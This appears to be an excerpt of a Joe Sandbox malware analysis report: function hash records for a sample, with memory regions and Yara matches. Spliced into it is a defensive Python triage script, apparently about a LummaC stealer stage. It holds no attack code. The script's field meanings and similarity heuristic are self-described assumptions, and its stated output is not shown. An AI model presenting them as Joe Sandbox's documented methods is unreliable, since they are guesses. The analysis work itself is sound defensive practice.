• Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
• Instruction Fuzzy Hash: AEC1DEB5A293018BD728DF28CC517ABB3F2EF85714F08992DE8C58B394E7389905C756
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: pq
• API String ID: 0-1239689891
• Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
• Instruction ID: 500f681a5dc29514dd64ddcd126b613fb850ea0849f1361138090b14647004ae
• Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FC1F1B5A183108BD724CF28C8917ABB3F2EF95314F08892DE8C58B395E738D945C75A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                                                                                                                                                                                          • Instruction ID: 13288392fc325517df86cad4ade3bbe7b083210dd55d9389e011795523972a75
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1D1E236B18211CFCB08CF29D8916AEB7B2FB8A315F1986BDD54697395C7349C02CB94
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "C
                                                                                                                                                                                                                                                          • API String ID: 0-2206442469
                                                                                                                                                                                                                                                          • Opcode ID: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                                                                                                                                                                                          • Instruction ID: c02c92b643ec8d6061b0b585771056a8a7c41fa14bd75fb70af057f1c39578d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86D1F135A18215CFCB08CF39D8912BEBBB2FB8A315F1986BDD44297381C7349802CB94
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                          • API String ID: 0-336475711
                                                                                                                                                                                                                                                          • Opcode ID: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                                                                                                                                                                                          • Instruction ID: 45885d3b4d1d012f206d53a257d01764ec68dfae15cf9f6058a92df6a7d4df09
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3D1483AA24222CBCB148FB8D9411AFB3B1FF4A311F1A8879C941A7394D7799D52C794
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
                                                                                                                                                                                                                                                          • Instruction ID: ac417bd7033ad02f43cf28793838c2ec0b1da586e3ce554615b0e95396046e71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36D1F3B2A083555FCF14CE24D89076BBBE6EFC4218F08856EE8998B381D775D944CBD1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                                                                                                                                                                                          • Instruction ID: 5488062bd572d25524ecec9402af32519797fcb3431be29340e35f15c478a4d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FD116B2B083249FC714DE15E48076BB7EAEF84314F48856EE9998B382D738DD4487D6
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: <
                                                                                                                                                                                                                                                          • API String ID: 2994545307-4251816714
                                                                                                                                                                                                                                                          • Opcode ID: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
                                                                                                                                                                                                                                                          • Instruction ID: bc8ced4a158fefc9f1f828ddbeaf2a6aa2fbb25641fc4c758a13245c578b86aa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15A19A766082508FD328CB24C8917BBB7D2EBCA304F1A897ED4D5D7252D738D841CB6A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: *+,-
                                                                                                                                                                                                                                                          • API String ID: 0-2789019292
                                                                                                                                                                                                                                                          • Opcode ID: 23cae88c1f738cc6ba2b498dbaf025c6893f717e4732141eb56e127dbc4aeec8
                                                                                                                                                                                                                                                          • Instruction ID: b5445966682d4bce51eeb82d58a9ef2afe1a37bbb8b7dea862fda5730c19d00d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23cae88c1f738cc6ba2b498dbaf025c6893f717e4732141eb56e127dbc4aeec8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69A128327093114FD718DF28C8A166BB7E2FB95314F1A843EE996C7751D736E80A8782
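The function records above are the raw output of the Joe Sandbox IDA plugin, and the one thing worth pulling out of them during triage is which memory region each function came from: the records rooted at 0x00400000 are the on-disk image ("based on PE: true"), while the records rooted at 0x02470000 come from a dump that is not PE-backed and carries Yara matches, which is where an unpacked LummaC stage is expected to live. The following Python is an added example, not Joe Sandbox code or an export of its API: it parses three records copied verbatim from the page, groups them by region, flags regions that are executable and writable, not PE-backed and Yara-matched, and scores Instruction Fuzzy Hash closeness with a positional nibble comparison. That comparison is an assumed triage heuristic, not Joe Sandbox's own similarity algorithm; likewise, in the dotted .sdmp name only the base-address field is confirmed by the Offset printed beside it, and reading the fifth field as a Windows page-protection value (0x40 = PAGE_EXECUTE_READWRITE) is an assumption marked in the code.

```python
"""Parse Joe Sandbox 'Memory Dump Source' / 'Similarity' function records.

Added example, not Joe Sandbox code. Field meanings beyond what the report
prints are assumptions and are marked as such below.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant

# Hash of the record that precedes the three below on the page, used to
# demonstrate similarity scoring against a near-duplicate function.
EARLIER_HASH = "AEC1DEB5A293018BD728DF28CC517ABB3F2EF85714F08992DE8C58B394E7389905C756"

# Three records copied from the report (constructed sample input for this example).
SAMPLE = """
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: pq
• API String ID: 0-1239689891
• Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
• Instruction ID: 500f681a5dc29514dd64ddcd126b613fb850ea0849f1361138090b14647004ae
• Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
• Instruction Fuzzy Hash: 3FC1F1B5A183108BD724CF28C8917ABB3F2EF95314F08892DE8C58B395E738D945C75A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
• Instruction ID: ac417bd7033ad02f43cf28793838c2ec0b1da586e3ce554615b0e95396046e71
• Opcode Fuzzy Hash: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
• Instruction Fuzzy Hash: 36D1F3B2A083555FCF14CE24D89076BBBE6EFC4218F08856EE8998B381D775D944CBD1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: InitializeThunk
• String ID: <
• API String ID: 2994545307-4251816714
• Opcode ID: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
• Instruction ID: bc8ced4a158fefc9f1f828ddbeaf2a6aa2fbb25641fc4c758a13245c578b86aa
• Opcode Fuzzy Hash: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
• Instruction Fuzzy Hash: 15A19A766082508FD328CB24C8917BBB7D2EBCA304F1A897ED4D5D7252D738D841CB6A
"""


@dataclass
class FuncRecord:
    source_file: str
    base: int
    protect: int
    pe_based: bool
    yara_match: bool
    api_id: str
    string_id: str
    instr_fuzzy: str


_FIELD = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
_SOURCE = re.compile(r"^(?P<name>\S+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")


def parse_records(text: str) -> List[FuncRecord]:
    """Split the report text on its 'Memory Dump Source' headers and read each record's bullets."""
    records: List[FuncRecord] = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields: Dict[str, str] = {}
        yara = False
        for raw in chunk.splitlines():
            line = raw.strip()
            if line == "Yara matches":
                yara = True
                continue
            m = _FIELD.match(line)
            if m:
                # Drop the 'Download File' link text the HTML export appends to Associated lines.
                fields[m.group(1)] = re.sub(r"Download File$", "", m.group(2)).strip()
        src = _SOURCE.match(fields["Source File"])
        if not src:
            raise ValueError("unrecognised Source File line: %r" % fields["Source File"])
        base = int(src.group("off"), 16)
        parts = src.group("name").split(".")
        # Assumption: 4th dotted field is the region base (checked against Offset),
        # 5th is the page protection as a Windows PAGE_* value. Not documented on the page.
        if int(parts[3], 16) != base:
            raise ValueError("dump name base does not match Offset for %s" % src.group("name"))
        records.append(FuncRecord(
            source_file=src.group("name"),
            base=base,
            protect=int(parts[4], 16),
            pe_based=src.group("pe") == "true",
            yara_match=yara,
            api_id=fields.get("API ID", ""),
            string_id=fields.get("String ID", ""),
            instr_fuzzy=fields["Instruction Fuzzy Hash"],
        ))
    return records


def summarize_regions(records: List[FuncRecord]) -> Dict[int, dict]:
    """Per region base: function count, PE-backed flag, any Yara hit, RWX protection."""
    out: Dict[int, dict] = {}
    for r in records:
        s = out.setdefault(r.base, {"functions": 0, "pe_based": r.pe_based,
                                    "yara_match": False, "rwx": r.protect == PAGE_EXECUTE_READWRITE})
        s["functions"] += 1
        s["yara_match"] = s["yara_match"] or r.yara_match
    return out


def suspicious_regions(records: List[FuncRecord]) -> List[int]:
    """Regions to dump first: RWX, not mapped from a PE on disk, and Yara-matched."""
    return sorted(b for b, s in summarize_regions(records).items()
                  if s["rwx"] and not s["pe_based"] and s["yara_match"])


def fuzzy_similarity(a: str, b: str) -> float:
    """Fraction of equal hex nibbles at the same position (assumed heuristic, not Joe's algorithm)."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a.upper(), b.upper())) / len(a)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for base, s in summarize_regions(recs).items():
        print("%#010x pe=%s rwx=%s yara=%s funcs=%d" % (base, s["pe_based"], s["rwx"], s["yara_match"], s["functions"]))
    print("unpacked-code candidates:", [hex(b) for b in suspicious_regions(recs)])
    print("similarity to preceding record: %.2f" % fuzzy_similarity(recs[0].instr_fuzzy, EARLIER_HASH))
```

Running it on the sample lists 0x00400000 as PE-backed with two functions and 0x02470000 as the only RWX, non-PE, Yara-matched region, and scores the first record's Instruction Fuzzy Hash as clearly closer to the preceding record's hash than to the 0x02470000 function's, which is the kind of near-duplicate pair one would collapse before manual review.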
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-3019521637
                                                                                                                                                                                                                                                          • Opcode ID: fa0d1dbce1a23fbc74967c61ce0e7e6dda5e1035aa80ce491c1cbcb6fe002f0c
                                                                                                                                                                                                                                                          • Instruction ID: 6aed45fb233aa2c4fcd704149bf514c963fdf9759b22d2805e031f74d6e47680
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0d1dbce1a23fbc74967c61ce0e7e6dda5e1035aa80ce491c1cbcb6fe002f0c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FA11632A183115FC718DF28C89166BB7E2EB99314F19983EE8D5C7351D639EC0A8786
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: rt
                                                                                                                                                                                                                                                          • API String ID: 0-702342736
                                                                                                                                                                                                                                                          • Opcode ID: 96955da5e24119577bef1d16513d434ecf30bcbd4f9f4d61d22251255e7bbb69
                                                                                                                                                                                                                                                          • Instruction ID: 0dc673b11f2f29cf9410cafdc44ae5b0865e538447e6119a8d8e6fbf35fadf0c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96955da5e24119577bef1d16513d434ecf30bcbd4f9f4d61d22251255e7bbb69
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFB11676908351CBC720CF29C8807AB77E1EFC5364F198A6EE8C98B351E7349942CB56
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: *iA
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2139077580
                                                                                                                                                                                                                                                          • Opcode ID: 14f9abbb0dd42c412e929981e749cd9f1ec22b6100c6e352dcc535541c924817
                                                                                                                                                                                                                                                          • Instruction ID: 6e94b3fcf232f5d03b146c20a53fd0e815a3357b0506236d01a4d6b9f375cd80
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14f9abbb0dd42c412e929981e749cd9f1ec22b6100c6e352dcc535541c924817
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F7104366452118BD728DF14C8927BBB393FBC9318F1A553E88D957296C738DC42CB89
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                          • Opcode ID: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction ID: a6bb3cadc1c1f50efd52203a6c2b27dcbaf93ae1b0c6510fd83965bb19eb5903
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28B15A705087819FD321CF18C98465BFBE5AFA9304F484E2DE5E997342D631E918CBA7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                          • API String ID: 0-3772416878
                                                                                                                                                                                                                                                          • Opcode ID: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction ID: a478b9cc30ed764529248bf8faf02e780253ee7d6c10264c25d16e611a95a898
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 697b2ba8bb72cb3d0de071efa58bd3f0d967c93cefef912759de0d6da7d3f539
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B138712097819FD321DF18C88061BFBE0AFA9704F444A6EF5D997382D635E918CBA7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction ID: 727f4a2fe62f4a3c7a5759466ec0683452c2c5dad0eef83429f19872382405a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB71D332A083654BDF24CE2DE48031FBBE6EBC5718F19892EE5949B391D7359C46C782
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                                          • API String ID: 0-123907689
                                                                                                                                                                                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction ID: c4d9b42fc58f09a600c35257a89653f03652f6e6775d652d055d3af208aaf9ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6671D332B083254BD724CE29E48032BBBE2EBC5710F99C52FE4949B395D7389D4587CA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: +
• API String ID: 0-574889464
• Opcode ID: b0fe1e084bfa776934ec890522000dd81f3ca0d79d61515cd075c0078fed0f1c
• Instruction ID: 6c9b66f3ed59470f856355df1e4d19b01ba46d9a3b4a8aff6cd736fb83055372
• Opcode Fuzzy Hash: b0fe1e084bfa776934ec890522000dd81f3ca0d79d61515cd075c0078fed0f1c
• Instruction Fuzzy Hash: 5F71AAB255C3909FD304EF65C89196FBFE2EB82204F48886CE1D59B311D63A8609DB97
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: rt
• API String ID: 0-702342736
• Opcode ID: b3c739285426b182c49243b50139ef0afb5c4c44dfbc0fbbface3e97e13e158b
• Instruction ID: b237badb12a382d7a1195034a46c3382f9449a87a17cdd3f6a5581cfe5666e15
• Opcode Fuzzy Hash: b3c739285426b182c49243b50139ef0afb5c4c44dfbc0fbbface3e97e13e158b
• Instruction Fuzzy Hash: E571EE715183218BC724DF28C89066FB7F2EFC4754F4A8A5EE8C58B364E7B09902CB46
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: _
• API String ID: 0-701932520
• Opcode ID: 860b7b0a3b2a3b631b4a1e805e6d132f1054dbf297f53b1e233929b4f662fe50
• Instruction ID: 1940eb75d87f4c5818835a9d612ebb1ca7bbd8f4cafe75c6f3ead8fe03827909
• Opcode Fuzzy Hash: 860b7b0a3b2a3b631b4a1e805e6d132f1054dbf297f53b1e233929b4f662fe50
• Instruction Fuzzy Hash: 0D710A2560469109D72CDF7484927377AE69F4430CB1991AFC965CFFABFA38C5038749
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: _
• API String ID: 0-701932520
• Opcode ID: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
• Instruction ID: 91adedf6748a9dca2f1a78b1e507b8d61ea5c2b795734500ece8cd71c55922e5
• Opcode Fuzzy Hash: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
• Instruction Fuzzy Hash: C271F85520469149D72CDF748893337BAE69F84308B2891BFD955CFBA7FA38C1438789
Strings

Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: x^T:
• API String ID: 0-4046853431
• Opcode ID: 2fba3cff2e712456624dfaec6a58e9274202b5be26e54dad0cca218db8944b39
